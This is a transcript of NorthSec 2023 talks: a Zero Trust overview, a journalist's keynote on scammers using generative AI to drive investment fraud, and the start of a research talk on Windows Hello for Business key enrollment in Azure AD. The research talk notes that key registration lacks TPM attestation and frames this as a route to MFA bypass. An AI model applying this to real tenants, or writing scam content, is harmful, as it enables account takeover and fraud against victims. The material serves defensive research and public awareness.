Good morning, everyone. Good morning, good morning. All right, welcome to day two of NorthSec 2023. Before we begin, I just wanted to reiterate the code of conduct. Some behaviors were reported yesterday. It's very important to us, and it can get you expelled from the conference, so please behave accordingly. Don't over-consume alcohol, and just be respectful of everyone, or else you will be expelled from NorthSec. With that done, I want to welcome one of our sponsors, Zscaler, who's going to give you a brief talk, and then we'll start with the opening keynote of day two. Thank you.

Hello, everyone. I hope you had a great night last night. Just to introduce myself, I'm Sébastien Langlois, the leader for Zscaler in Eastern Canada, and we're really proud to sponsor the event. I'm on just before the keynote speaker, so I'll try to be brief. I want to introduce Jeff Yates, who is our keynote speaker today. Thank you, Jeff, for being here. I just wanted to give a quick presentation. It's not going to be product related, don't worry, and it's not going to be marketing related. There's a hot topic that we're hearing about from many customers: a lot of board members, CISOs, and the C-suite in most companies are trying to figure out what Zero Trust is. Who has heard about Zero Trust? Just raise your hand. Well, everybody has heard about Zero Trust, and I'm pretty sure everybody has their own definition of it, so I'll try to shed some light on that. We did a survey in collaboration with another company, and 75% of organizations have some sort of Zero Trust project: they're discussing Zero Trust, what it means for them, and how they can implement it. But only 14% of organizations have reported that they have done a Zero Trust deployment, and the reason for that is the lack of clarity. Everybody has their own definition of what Zero Trust is.
You know, at Zscaler we had our definition. You talked to other vendors; we all had our own definitions around Zero Trust. But what's really cool is that there's now a framework that has been built around Zero Trust, and I'll present that framework to you. First, just before we start: John Kindervag initiated Zero Trust in 2010. He was a Forrester analyst, and this is when Zero Trust was created. Until two years ago, we didn't really have any framework. You can agree with the framework or not, but there was no framework, so everybody had their own definition of Zero Trust. What are we trying to achieve from a Zero Trust perspective? The crown jewel is your data, and what we need to protect is that data. We have users, using devices, that connect through a network to an application to get access to your data. So these are the five pillars of a Zero Trust foundation: identity, device, network segmentation, application, and data. That's, at a high level, the Forrester concept of Zero Trust that was developed by John and that we still use today. The problem was that everybody had their own definition of what Zero Trust is, but now NIST has come out with a Zero Trust framework. We can have many discussions around the framework. Is it good? Is it bad? Should it be this, should it be that? But at least now we have a framework, and people will work to improve that framework. Bottom line, what you need to understand from this framework is this: today, most customers have users that connect to resources through an enforcement point, which is a firewall, that is connected with your identity, and depending on your identity, you'll access the proper resources. What NIST is bringing into the framework is a policy decision point, which is a true policy engine.
It understands the user, the device, and the context, and it is integrated in constant feedback loops with your policy enforcement points and policy information points: your endpoint, your SIEM, all the tools you have that are able to detect something. You need a feedback loop between those systems and the policy decision point, and from there, depending on the user, the device, and the context of all that information on the right, you'll be able to make good policy decisions about who is accessing what and where. As an example of a policy, a user could access an application, but when he's located in China, the subset of applications he can access is reduced. That's an example of understanding the context, and the more context we have, the more information we have from those policy information points, the better decisions we can make from a policy decision perspective. So this is really what you need to understand: before, this is mainly where all customers are, and within the NIST framework, this is the addition, which is the PDP and the PIPs. Really simple. So what does it mean? Very easy: you need to verify everything, every session needs to be authenticated, and we need to understand the context from those policy information points. Once we understand that context, we control and scan the traffic against all malware, known and unknown, and after that we just enforce the policy, so we connect the user with the appropriate resources or applications. That's, from a high-level perspective, what we're trying to achieve with Zero Trust, and I think a picture is worth a thousand words there. For most customers today, this is still what you have: you authenticate the user, and the user is on the network and sees a lot of resources. Not good, not bad.
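The context-dependent decision the speaker describes (signals from policy information points feeding a central policy decision point) can be sketched in a few lines of Python. Everything here, the rule set, the application names, and the home-country check, is invented purely for illustration; it is not taken from NIST SP 800-207 or from any vendor product:

```python
from dataclasses import dataclass

@dataclass
class Session:
    user: str
    device_compliant: bool  # signal from an endpoint agent (a policy information point)
    country: str            # signal derived from the source IP (another PIP)

ALL_APPS = {"mail", "wiki", "hr", "finance"}
RESTRICTED_ABROAD = {"hr", "finance"}  # subset withheld outside the home country

def decide(session: Session) -> set:
    """Toy policy decision point: return the applications this session may reach."""
    if not session.device_compliant:
        return set()                         # block everything on an unhealthy device
    if session.country != "CA":
        return ALL_APPS - RESTRICTED_ABROAD  # reduced subset when abroad
    return ALL_APPS                          # full access at home

# The same user gets a different answer as the context changes.
assert decide(Session("alice", True, "CA")) == ALL_APPS
assert decide(Session("alice", True, "CN")) == {"mail", "wiki"}
assert decide(Session("alice", False, "CA")) == set()
```

The point of the feedback loop is that the PIP signals (device health, location) are re-evaluated continuously, so the same identity can be granted a different subset of applications from one session to the next.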
Most of the control points that we have today are bolted to the network, and every time you touch the network, it's complex. And you cannot stop the business. As a security person, you want to be there to support the business, not slow it down. So most of the time you'll be a bit loose, because if you make too many changes on the network, you're going to break something and slow down the business. What we're trying to do from a Zero Trust perspective is ensure that each user has access to only the doors they need to do their job. It's like John Kindervag said: it's least-privilege access that we're trying to achieve with Zero Trust. In the end, if you're successful in a Zero Trust implementation, users will access only the applications that they need to work. So, nothing product related. Andrew's going to be happy; he told me, don't talk about products, marketing, and everything. Thank you for your time, and Jeff, over to you. Thank you for being here, and we're happy to sponsor the keynote this morning. Thank you.

Hello. How's everybody doing today? Good. How's the hangover? Was there a party last night? Just give me a couple of seconds to get set up here. Thanks for coming out so early today. I'm betting a lot of you don't know me. My name is Jeff Yates. I'm a journalist at Radio-Canada, which is the French-language arm of CBC. One second... sorry for this. Here you go. Okay, there you go. Please ignore the "hire a hitman" bookmark; it's work related, I promise. I swear, this will make sense in a couple of minutes. So why do I have a "hire a hitman" bookmark? I work with the Décrypteurs at Radio-Canada. We're the team that looks at basically bad stuff online. We cover disinformation, you know, fake news, stuff like that. We also cover online extremism, scams, stuff like that.
So the "hire a hitman" obviously is not a real hitman. It's a scam website that I was looking at, and I forgot to remove the bookmark before coming here and freaking everybody out. Thanks to Hugo and Jean-Philippe for inviting me. I don't think Jean-Philippe made it. Nope. Okay, cool. I guess he had a bit of a party last night. They wanted me to come and give you my perspective on the topic of AI. I know this is a really loaded term. There's a lot of hype and a lot of moral panic around this, and I know that AI is probably not the correct term for what everybody's referring to, but I still think it's a useful shorthand for the generative AI tools that have been given to the public, like ChatGPT, Midjourney, stuff like that, that are causing all of this hype and panic. So I'm going to use AI as shorthand for these systems. That's what I'm talking about when I'm talking about AI: these tools that have been given to the public. A bit of background about what we work on. A couple of years ago, we exposed a company working right here in downtown Montreal that was running subscription trap scams. They were making $100 million a year. They were working on Peel Street, right downtown here. We uncovered this, and the company shut down. We were kind of happy about that outcome, because this company was basically running fake Netflix-type websites. People would sign up, and then their credit card would get charged and billed over months. That's how they made their money. We also, just this year, covered a network of criminals in Montreal that are operating those little scam texts that everybody gets. So you get a text on your phone that says you owe $300 for your power bill, or stuff like that. They use a link that they then use to steal the person's identity. So we discovered this whole parallel economy in Montreal, these kids in Montreal that operate a lot of these scams.
And they've built a whole parallel economy using stolen credit cards and stuff like that. So that's the type of stuff we work on, and that's the framework through which I look at these new tools that have been made available to the public. I think the debate around these tools is a bit exaggerated. If you look at the nightmare scenarios that are often in the media, you'll have something like this: you have a deepfake of Joe Biden, yada, yada, yada, we're all dead. That's the simplistic framework a lot of people think these tools are going to be used within: they'll make political deepfakes that'll cause all sorts of political strife and stuff like that. That's possible. I'm not saying it's not going to happen, but I think a lot of the misuses of these technologies for political purposes are going to be much simpler and much less sophisticated than that. When I saw the first image generators come online last summer, I had the feeling that these AI tools like Midjourney would be used almost as political cartoons. So not necessarily to create a fake image and convince people that something is actually happening, but more to create an image of your opinion of what's happening in the world. A good example of this was when Donald Trump was arrested a couple of months ago. People were creating these images showing Donald Trump getting arrested. They're creating these images as an idealized version of what they want reality to be like. So it's less about using these tools to convince people and more about showing your opinion, like a political cartoon, basically, to parody reality. The inverse opinion that I see from a lot of experts I follow on Twitter is, well, these tools are just bad, they suck, right? They'll say, look at how many teeth this girl has. How could anybody think this is a real image?
It will never convince anybody. Or this image that was shared by Donald Trump Jr.: what the hell is this guy's face, you know? So there's a very prevalent attitude that these things, maybe not never, but as they are right now, are not good enough to actually cause very important damage. For ChatGPT, I've seen a lot of opinions that it's just a glorified autocomplete that makes a lot of mistakes, and it really does. I asked ChatGPT to write a biography of me, and it says I was born in 1980: not true. It says I went to the University of Montreal: not true. It just says this really confidently. So a lot of people look at this and they're like, well, this is not good. If you get ChatGPT to write articles for you, it's just very low quality, and most people would maybe be able to see through that. What I think, though, is that it's already good enough to cause damage, because these systems are optimized for spam. When you think about spam, what is it? It's low-quality content that is cheap to produce and that can be sent to thousands, hundreds of thousands, millions of people. Well, these systems take one of those things out of the equation: they make it extremely cheap to create infinite content, and it's pretty much instantaneous. So it's perfect for spammers and people doing clickbait and stuff like that on social media. Now, if you're wondering who would want to click on crappy articles written by ChatGPT, or images of people with too many teeth, I invite you to go look at Facebook's most widely viewed content. They produce a quarterly report where they show the most popular posts on Facebook for the past three months. This was the last report, and you can see that the most popular stuff online is basically fish food, right? It's not good content. So these systems are perfectly adapted to create an infinite flow of content that people will mindlessly click on.
We're already seeing ChatGPT being used for all sorts of spam online. There's a funny situation where a lot of people use ChatGPT, copy the whole thing, and forget to remove the "Regenerate response" label at the bottom. So if you search for "regenerate response" on Google, on Amazon, or wherever, you'll see a ton of these. This is a dropshipping-type operation that used ChatGPT to write some ad copy for their soap. This is a real estate listing written by ChatGPT: "Regenerate response." So obviously, I think these systems are already here. You might not see that much harm in spam. It's annoying, it's low-quality crap that everybody says they don't click on, but obviously people do click on it, because it's often some of the most popular content on social media. Honestly, on a personal level, I think this might one day make large platforms like Facebook basically unusable for people. If you have infinite content, you don't know what is written by humans, you don't know if the pictures of the people are real, if the accounts are real; they can use ChatGPT to answer questions or direct messages. I can't show you this because we haven't reported it yet, but last week we did find a network of 300-something Facebook pages that are running thousands of ads on Facebook, all basically using these systems. They'll create the images with Midjourney. They'll answer comments using ChatGPT almost instantaneously. They'll answer direct messages. They don't speak English as a first language, but they're able to produce English-language content. They'll use ChatGPT to create these clickbaity articles. I can't show you that because we haven't reported it, but it's already here. They're already using this for these purposes. And it's kind of funny, because these clickbaity types of articles were out of style for a couple of years; Facebook and Google kind of cracked down on this type of content.
Google demonetized or said they wanted to demonetize clickbait websites and stuff like that. Facebook said that they cracked down on this type of content. We're seeing a resurgence of this now because it's so cheap to produce using these systems so you don't have to pay someone $5 an hour to write articles anymore. You can just generate them automatically and you can have an infinite amount of content. So I think it's going to be a problem in the upcoming months, years for people who use social media. I don't know what it's going to do. It'll be interesting to see how the platforms actually react and try to moderate this new reality, but it's coming fast, that's for sure. But I want to drill down today on one specific case where I see this already being used and I can see kind of future potential uses of these technologies to cause some real damage in the world. So I want to talk to you about the world's biggest scam. I started covering this scam two years ago. When I first realized how massive this scam is, it completely blew my mind. I had no idea that this existed. It's under our feet. It's a massive fraudulent industry that steals billions of dollars from normal people every year. And not many people are talking about this. Unfortunately, it's really hard to get the word out on this. And unfortunately, world governments aren't really acting either. So the scam is pretty simple on the surface. So people will end up on a trading website that looks legit. They're often promised that they're going to be making 200, 300 percent returns. They're asked to put in a small amount of money to invest, usually $250. When they do invest, so they send money, they're shown a trading platform that looks real. It shows their investment. It's all fake. So the people running this scam, they can show the user absolutely anything on this. So the person usually puts more money, puts more money, more money. They have an investment agent that calls them basically every day. 
Some of these victims form relationships with these agents. They feel like they're almost a member of their family. I've seen cases where this goes on for a year. So they'll call the person: how are your kids doing? Okay, cool. Yeah, you should invest, because look, you made a lot of money last month, so you should put in more money, more money. And these people get absolutely cleaned out. They lose everything. At Radio-Canada, we talked to Joanne Gantzi, a woman from the Outaouais region. She lost $250,000, basically all her home equity, gone to this scam. We spoke to Fernand Laroche. He lost a million dollars, his entire life savings completely wiped out, because he thought he was investing in Bitcoin. I get that most people here would probably not fall for this type of scam, and you're probably thinking these people are kind of dumb for clicking on this. This guy's a psychologist, you know; he's not dumb. Maybe he has a bit of trouble understanding how the internet works or how crypto works, but a lot of people are getting wiped out by this. In Canada, just last year, the amount of money lost to these frauds doubled, to almost $100 million. And that's an understatement: even the government admits that only five or 10% of victims actually report being a victim of this type of scam. The average victim loses $70,000, so that's a considerable chunk of change. If you're interested in this scam, I invite you to watch this documentary from BDC. It was made by Simona Weinglass, who we see here. She's an absolute beast of an investigative reporter. She works at the Times of Israel, where this fraud basically started. In this documentary, she uncovers one of these criminal gangs. She finds out that it's being run by an ex-politician in Georgia. It's really wild stuff. I really, really recommend watching it. But just to give you a quick idea of what we're talking about here, Simona describes it as the Uber of fraud.
And it really is that: it's applying the lessons of big technology to fraud. A lot of people, when they imagine fraudsters doing this type of stuff, imagine a couple of guys in a basement with hoodies on, stealing people's money. It's not that. It's an industry. We don't know exactly how many, but there are between 10 and 15 of these criminal gangs running these scams. They have dozens of call centers. Each call center has 100, 150 employees. They're salaried people. This is a business. And what they've also started doing now is they've basically Uberized this system, so it's fraud as a service, basically. How it started was in Israel. They used to run these call centers running what's called a binary options scam. Basically, it's a way of betting on the stock market: you bet that a stock goes up or down, and you either win or you lose. Most people lose money. What happened is these guys realized that most people lost money, so that's good for them. And if people win money, you can just not give them their money. That's how this scam started: when people made gains, they would stall. They would say, oh, we need KYC, know your client. You'll need to pay income tax; you need to pay the Israeli income tax on your gains, stuff like that. And if all else failed, they could just close the website and start a new one; it costs nothing to start websites. In 2017, Israel banned binary options, so they had to find something else. They started doing crypto. If you've ever heard of the ICO boom in 2017, 2018, a lot of these guys were into that. But they also developed a system where they sell this fraud as a service. Instead of running the call centers themselves, they sell it as a service: for a fee and a cut of the profits, they'll help you set up a call center, and they'll help you train your employees.
They'll help you launder your money and show you how to do it in a way that is safe, or safe-ish. And so in the past five, six years, we've seen a lot of these call centers popping up pretty much everywhere in Europe. We've seen some in Lithuania, Poland, Ukraine. There were a couple last month in Malaysia that got busted. There are even some in South Africa. So it's all these criminal operations run remotely like that. It's a massive, massive, massive industry. On this live stream from OffshoreAlert, Ken Gamble, a fraud researcher in Australia, was saying, and this was three or four years ago already, that this fraud had basically escaped most governments' ability to do anything. Because the money travels so fast, from bank account to bank account to bank account, it's almost impossible for local police to actually investigate these crimes. One of the really messed-up things these criminals do is this: when you sign up to the platform, they'll ask for KYC, because they act like they're a legitimate financial service. So they'll ask for photo ID and all your personal information: date of birth, social security number. They don't care about doing KYC; obviously, they're criminals. But what they will do is use that information to open a crypto account on Kraken or Crypto.com and then use that to launder money. And once they're done with it, they'll actually sell the personal info on the black market, so they'll make even more money with the info they stole. It makes it basically impossible for local police officers to do anything. If they've managed to track the crypto payments to the crypto exchange, well, the person who cashed out is someone whose info was stolen by the same criminal group. So it makes it exceedingly hard, and most countries don't really do anything. The U.S. is one exception. These criminals don't accept U.S. clients. So if you go on the website using a U.S.
IP, they geofence it; you can't go there. To sign up, you have to swear that you're not a U.S. citizen. They're extremely afraid of the U.S. One reason is that a couple of years ago, one of these crime bosses went to the U.S. to visit her family, and she got picked up and sentenced to 22 years in U.S. prison. So they're very afraid of the U.S. Germany is doing some pushback on this fraud. There have been a couple of crackdowns on call centers in the past two years in Europe. There was one a couple of months ago in Lithuania and Serbia, I think. But most countries aren't doing anything. I can tell you that Canada is not doing much of anything about these frauds, unfortunately. The victims we spoke to are talking to a wall. Basically, they lost their life savings, and they're being told by the police that there's nothing to be done. They can't do anything. So why am I talking about this? Why did I talk about this for the last 15 minutes when I'm supposed to be talking about AI? It's because this whole sophisticated industry of fraud has one major entry point. I described the back end. The front end looks like this: it's Facebook ads, basically. These Facebook ads usually feature a local celebrity. So they'll target Canada with... 90% of the ads have Elon Musk. But they use local politicians in Canada to try to get people to click on these ads. They use local celebrities. I saw one two days ago with Seth Rogen. So they'll try to convince people to click on these ads using local celebrities. When you click on the ad, you get sent to a fake newspaper article that says, oh, you know, Elon Musk invented a new way to make money, click on this. And then you're sent to the actual fraud. Now, I know, once again, most people here would never fall for this, and you probably think it's ridiculous. This works. This works extremely well. It's really hard to pin down how much money these criminals make, but it's upwards of $10 billion a year, probably more.
One of the criminal groups makes $1 or $2 billion a year, and it's not even the biggest one. So it's extremely massive. And the entryway into these scams is really simple. It's spam, basically. It's really low quality. Most people would read this and realize that it's complete crap, but unfortunately, it works. And we often say, well, if you sign up for this, you should have done your own research. You should have tried to at least know what you're investing in. Here's one of these crime products, called Quantum AI. So let's say you're someone who sees this and you're like, oh, I want to look at what this is. So you Google Quantum AI, and every single result on the first page is ads bought by these scammers. There's actually one real result on the first Google page, and it's for a Google product called Quantum AI as well. So these people beat Google at SEO on their own platform. And here's how I'm tying this into AI: these ads are not run by the criminals themselves. They're run by affiliate marketers. These crime syndicates don't run their own ads because they want plausible deniability. So they'll pay affiliates, often people in countries like Bangladesh, Pakistan, Vietnam, stuff like that, who will run these ads on Facebook for them. This is really lucrative for the people running the ads. This was on an affiliate marketing website yesterday. The payout is $1,250. So if you manage to get someone to click on your ad and make a minimum deposit of $250, you get $1,200 US. That's a lot of money in a lot of countries. And if you can get a lot of people to click on these ads, you're going to make a lot of money. These AI systems like ChatGPT are a boon for these people. Oftentimes they don't speak English, they don't know the local culture or political context, and they want to create ads that will make people click.
So already, they can use systems like Bing AI or ChatGPT, which can now browse the internet, to ask what the biggest news stories in Canada are today and craft ads around that. They can use ChatGPT, of course, to create the actual ad copy. The only thing holding these scammers back was that it cost money to create these ads. They would have to pay people on Fiverr to write these fake news articles; that costs money and takes time. Now they can just do it automatically with these systems. They can create images, of course. And we're already starting to see these scammers use the AI systems to run their scams. This is one I saw on Twitter a couple of days ago. This is clearly written by ChatGPT. You can just sense it; ChatGPT has a certain style to it. So they're already starting to use this to write these ads, to write these articles. I saw one yesterday. I don't know if it'll play. No sound, okay. So it's a deepfake of Tucker Carlson. They used ElevenLabs, which is a voice cloner, to clone his voice, and he's talking about how Elon Musk created this wonderful new way to make money. Once again, I don't think most people here would fall for this. The lips are kind of off. But these things work. They've been working for years. It's just another tool they're going to use to ruin people's lives, basically. The last frontier these scammers had was that it costs money and time to create the content that gets people to click and sign up to these frauds, and that barrier is now gone. Just to finish up: it's not just using these tools to create content for people to click on. They're already using AI in their ad campaigns. Crypto is kind of down; there's less of a buzz on crypto lately. So they've started, of course, including ChatGPT and OpenAI in their ads, because that's the new hotness. People want to invest in this. So, yeah. Basically, I'm personally kind of worried about where this is going. It's already a huge problem.
It's already a problem that is exploding. What we're hearing is that these criminals are targeting Canadians specifically. Canadians are a prime target for these frauds because authorities aren't very aggressive in pursuing the people behind this, and Canada is a relatively rich country. So our citizens are being targeted by these massive criminal gangs. And I just want to finish on this. Often with fraud, we're under the impression that it's just too bad, it's money stolen, and you can always make more money or whatever. But these are criminal gangs. They use this money to finance corruption in certain countries. They're paying off authorities to run their call centers. It's organized crime, so there's always the presence of violence in these circles. The money being stolen from Canadian retirees, basically, is going to these criminal gangs and financing criminal activities overseas. So it's a huge problem. And unfortunately, these systems have basically given them a huge gift to continue doing their operations and nuking people's lives. So that's all I had to say about that. Thanks. Thanks for coming out.

Hello, hello, hello. All right. So moving on from the keynote, we have a vulnerability research block of two talks, and here I have my moderator for the vulnerability research block. After particularly enjoying his master's degree on symbolic execution of binary software, Philippe Pépos-Betzklai is now a PhD candidate obsessing over automatic antivirus evasion. He's worked on red and blue teams. He's a founding member of Resilience Co-op and a member of the Eternals Seconds, a hacking and CTF team that has participated in NorthSec for multiple years. So welcome, Philippe. Enjoy.

Thank you, Igor. So we have a very cute block with two very nice speakers who have prepared something really cool.
So first up, we have Dirk-Jan. Well, you probably know him already, so I won't take too much time. He's a hacker, security researcher, and red teamer. He's been a Microsoft Most Valuable Researcher multiple times, and he recently started his own company, in 2022 if I remember correctly, which is called Outsider Security. He usually works on Active Directory security, Azure AD, stuff like that. So today he's going to give us a little deep dive on Windows Hello. The floor is yours.

Amazing. Thank you. All right. Good morning, everyone. Today we're going to talk about Windows Hello. I had to make some pun with "hello," so I call it Hello from the Other Side. I'm not going to sing; no one's going to want that. A little bit about me: I'm Dirk-Jan, and I'm from the Netherlands. Last year I started my own company. I do a mix of research, consultancy, pentesting, and also trainings on Azure AD. I really like to research these things. Most of my time researching, I first build some tools, and then I use the tools to analyze, okay, how does this actually work? That means I've written quite some tools, and almost all of them are available as open source. I have a blog where I write about these tools, and I have a Twitter account where you can stay up to date with my research, so if you want to follow me there, go ahead. In this talk, we're going to cover quite a lot of content. I'm going to start by explaining some Windows Hello for Business concepts. I'm going to shorten it to WHFB from here on, because writing it out would be very long. I'm also going to shorten it to just Windows Hello instead of Windows Hello for Business. Technically, there are some differences, but for our purposes, just call it Windows Hello.
I'm going to look at what flavors of Windows Hello there are, how you can deploy it, how they work on a technical level, and what we can do with it, or what we could do with it, which also involves bypassing things like multi-factor authentication, and lateral movement. So a lot of fun. For those of you who don't know exactly what Windows Hello for Business is, basically it's one of Microsoft's products which allows you to go passwordless. So instead of using a password, Windows Hello uses cryptographic keys that are stored, hopefully securely, on your device, and then you can basically unlock that key either via a PIN or with biometrics like a fingerprint, and then you can authenticate. And each device that you're using with Windows Hello has a separate key, and that key can be used to authenticate to things like Azure Active Directory. There are also flavors that are purely for on-prem Active Directory, but in this talk, we're mostly focusing on Azure Active Directory and on some hybrid parts in which Azure Active Directory is actually the key component. So there's some prior work that this talk is partially based on. The most interesting one is, I think, the talk Exploiting Windows Hello for Business by Michael Grafnetter. It's from a couple of years ago, from Black Hat Europe, where he presented about the Windows Hello for Business internals in Active Directory. And this was the inspiration for the shadow credentials attack, which you may be familiar with, which is basically an attack for on-prem Active Directory. There's also been quite some research into bypassing the facial detection of Windows Hello, and into how it actually works with the TPM and such. Benjamin Delpy did some research on how the Windows internals are handled, but I couldn't really find anything that was specifically on how Windows Hello works with Azure AD. So I basically started researching that.
And before I started, I was like, okay, what are the key protections and the key components? And I basically came up with this list. This is mostly what Microsoft advertises it as. So Microsoft basically says, okay, Windows Hello for Business provides strong phishing-resistant multi-factor authentication. So it's very secure, obviously. One of the reasons why it's so secure is because you need MFA to provision it. So it works as a second factor. It's bound to a specific device, so you cannot just steal it and use it on some other device. And they also focus heavily on hardware protection of keys. So they store these things in a trusted platform module, which prevents attackers from extracting the keys, even if they have full control over the operating system. And this all makes it much more secure than password authentication. So keep this list in mind, because we'll get back to it later. And there are a couple of flavors that you can deploy Windows Hello for Business as. We're focusing mostly on the Azure AD native scenario today, but there are also some hybrid scenarios and a way that you can deploy it in Active Directory only. The thing is, if you're using Azure Active Directory, then you already have Windows Hello for Business, basically, whether you're actively using it or not. It's always enabled. I haven't found a way to disable it. I don't know if it's even possible to disable it. So if you are using Azure Active Directory, then you have Windows Hello for Business. All the other flavors that work in a hybrid configuration require some sort of configuration, so unless someone specifically configured that, you usually don't have it in your network. But the Azure AD native one is always there, basically. And there are a few components that are important if you have Windows Hello in Azure AD. So you always need some device. These could be Azure AD joined or registered devices, and they could be managed using MDM, such as Intune, for example.
And then Windows Hello for Business enrollment will take place as the final part of the Windows setup. Or alternatively, if it's enabled later on, then the OS will basically prompt you to replace your sign-in credentials with Windows Hello for Business, and that will show the following screen. I'm using Windows 11 just to show that this works on the most modern version of the operating system. So basically it will give a pop-up and say, okay, well, you signed in with your password. Now let's set up some biometric authentication or PIN authentication to use Windows Hello. It will then prompt you for multi-factor authentication. An important part is that to enroll these things, you normally always need multi-factor authentication. Of course, we'll look into how that works a bit later on. And once you complete the multi-factor authentication, it prompts you to set up a PIN, and that PIN you can use on the device to basically unlock the keys and then authenticate. You can also use a fingerprint or whatever is present on your system to unlock these keys. And there are some technical components involved here. One of these is the device identity. So in Azure AD, each device that's registered has an identity that basically uses public and private keys to prove the device identity. And using the device identity, the device can request a primary refresh token. So primary refresh tokens are basically tokens that are stored on your device with which you can use single sign-on to all Azure AD connected resources. So once you have a device that has a primary refresh token, you no longer need to sign in every time or do MFA every time; it's tied to your device. And also an important component is the trusted platform module, because all of the above keys are protected by hardware if you have a TPM on your system.
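As the talk describes later, the PRT request a device makes is, at the wire level, a nested JSON web token: an outer token signed with the device key that carries an assertion signed with the Windows Hello key. Here's a rough structural sketch in Python; it is purely illustrative — the `"alg": "none"` placeholder stands in for the real signatures, and the field names used are assumptions for readability, not the actual wire format.

```python
import base64
import json
import time

def b64url(data: bytes) -> str:
    # JWTs use unpadded base64url encoding
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def unsigned_jwt(header: dict, payload: dict) -> str:
    # "alg": "none" stands in for the real signatures (the device key for
    # the outer token, the Windows Hello key for the inner assertion).
    return f"{b64url(json.dumps(header).encode())}.{b64url(json.dumps(payload).encode())}."

# Inner assertion: the part that would be signed with the Windows Hello (NGC) key.
inner = unsigned_jwt(
    {"alg": "none", "kid": "example-key-id", "use": "ngc"},
    {"iat": int(time.time()), "tid": "example-tenant-id"},
)

# Outer request: would be signed by the device, carrying a nonce, the
# username, and the inner assertion. Field names here are illustrative.
outer = unsigned_jwt(
    {"alg": "none"},
    {"request_nonce": "example-nonce",
     "username": "tpmtestuser@example.com",
     "assertion": inner},
)

body = outer.split(".")[1]
payload = json.loads(base64.urlsafe_b64decode(body + "=" * (-len(body) % 4)))
print(payload["assertion"].count("."))  # → 2: the assertion is itself a JWT
```

The nesting is the point: Azure AD validates the outer signature against the registered device and the inner one against the registered Windows Hello public key.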
So that's the device key, the session key of the PRT, and the keys that back the Windows Hello for Business component, so that ensures the security of these keys. So if we look at the technical flow that basically happens when we configure Windows Hello for Business, we see that it starts with a request for that MFA upgrade. So if you set up your device, you will first enter your username and password, and then it will ask you for additional MFA to provision this key, basically. And how it does that is it puts in the request a value which sets the AMR values to NGC MFA. And that's kind of a special parameter which indicates that for this next step we need a fresh MFA token. So of course if you are already signed in for a long time, then MFA is usually cached in the browser or on your device, but NGC MFA means that it should be a fresh MFA, so you will get interactively prompted whether or not you already did MFA like five minutes ago. NGC actually stands for Next Generation Credentials, and this is a term that we'll see more often. So internally Microsoft calls Windows Hello for Business keys NGC keys, and NGC MFA is also where this term is used to indicate that this is MFA to provision a Next Gen Credential, so it's to provision a passwordless credential set. And if we use this NGC MFA authentication, that's basically reflected as a claim in the access token that we get. So if we decode the access token that results from this authentication, we see that we authenticated with a password, there's the RSA claim which means that we did the device authentication as well, and also the MFA and NGC MFA claims, so that indicates to the receiving service that I just did a fresh MFA evaluation and that my MFA methods are current and not just some cached MFA. So if we want to provision a Windows Hello for Business key, there are a few technical requirements.
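As an aside, decoding an access token like this is easy, since JWT payloads are just base64url-encoded JSON. A minimal sketch of the claim inspection described above — the sample token and its claim values are constructed here for illustration, and "pwd", "rsa", "mfa" and "ngcmfa" as amr strings are assumptions based on the claims the talk names:

```python
import base64
import json

def decode_jwt_payload(token: str) -> dict:
    """Decode the (unverified) payload segment of a JWT to inspect its claims."""
    seg = token.split(".")[1]
    seg += "=" * (-len(seg) % 4)  # restore the padding that JWTs strip
    return json.loads(base64.urlsafe_b64decode(seg))

def b64url(obj: dict) -> str:
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()

# A sample token carrying the authentication-method claims discussed above.
sample_token = f'{b64url({"alg": "none"})}.{b64url({"amr": ["pwd", "rsa", "mfa", "ngcmfa"]})}.'

claims = decode_jwt_payload(sample_token)
print("ngcmfa" in claims["amr"])  # → True: a fresh MFA was done to enroll the key
```

Note this decodes without verifying any signature, which is fine for inspecting your own tokens but is not authentication.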
So these keys always need to be created from a certain device, so you need to do the authentication from a joined or registered device, and basically that will get you a device ID claim in your token. So you cannot just log in in the browser and then start provisioning Hello keys; you need to do that on a registered or joined device. The token should also contain the NGC MFA claim, so that means that you performed MFA within the past about 10 minutes, I don't know what the exact time is. And of course you need a token for the right service, and in this case the service that handles this key enrollment is the device registration service, which lives on enterpriseregistration.windows.net. So we had a look at how this key is registered, and we found out that it's actually a very simple post request. All it does is say: here I have an access token, here's my public key, that's just an RSA key that's encoded in a specific way, and that's it. And I was a bit surprised by this, because of course Microsoft is very big on the whole hardware protection, keys need to be in a TPM, and the registration is just: oh, here's a public key, that's it. There's no proof that this key is in a TPM, there's no attestation going on, it's just: here's an access token, here's a key, good luck. All right, so the response basically is just a status that, hey, the key is registered, and here's some additional context. We don't need this context in most cases; it's needed for some specific hybrid scenarios. In this case we can just ignore it, because our key has now been provisioned and we can authenticate with this RSA key that we've registered. So to do that, that's basically a PRT request. So if you're familiar with how primary refresh tokens are issued, it usually goes via a request that involves a JSON web token bearer grant, and that's a signed request using the certificate of the device to prove that it's from a legitimate device. It's just an OAuth request to the token endpoint, and it contains this request, which is an embedded JSON web token. And if we decode that, we see that in the header we have the device certificate, so that's to indicate to Azure AD that it's this device that's doing the request. The device also signs this JSON web token so that Azure AD can validate it. And in the payload we see a few parameters. One is a nonce; that's a very common thing, just to make sure that you cannot do a replay attack, because the nonce expires after a few minutes. Then the username that we're authenticating as, in this case the TPM test user. And we have an assertion, which is another JSON web token. So if we take the JSON web token out of the JSON web token, then we actually see the part that's signed with the Windows Hello key. At the top you see the key identifier, which indicates which key was used to sign this. The use is NGC, so that's the next gen credential key, which indicates that, hey, this is a token from a next gen credential. And in the assertion we see a timestamp; that is, again, against replay attacks, because the assertion will expire after a certain time. It also contains the tenant ID, so that Azure AD knows this request goes to this Azure AD tenant. So if we send this request, then we basically get a response. The response will be encrypted, but the device can decrypt it, and then we get a primary refresh token, we get an encrypted session key that's needed to use the primary refresh token, and we also get some Kerberos things; we'll get into the Kerberos part later. The important part is that with this Windows Hello key we can get a primary refresh token and a primary refresh token session key. So I integrated this flow into my ROADtools set, in roadtx specifically, so roadtx now supports generating these keys and enrolling the keys, and also getting the tokens that are required to enroll these keys, so that means a token with the fresh MFA upgrade, so to say. So just to demonstrate that with this short video, we're going to start with requesting
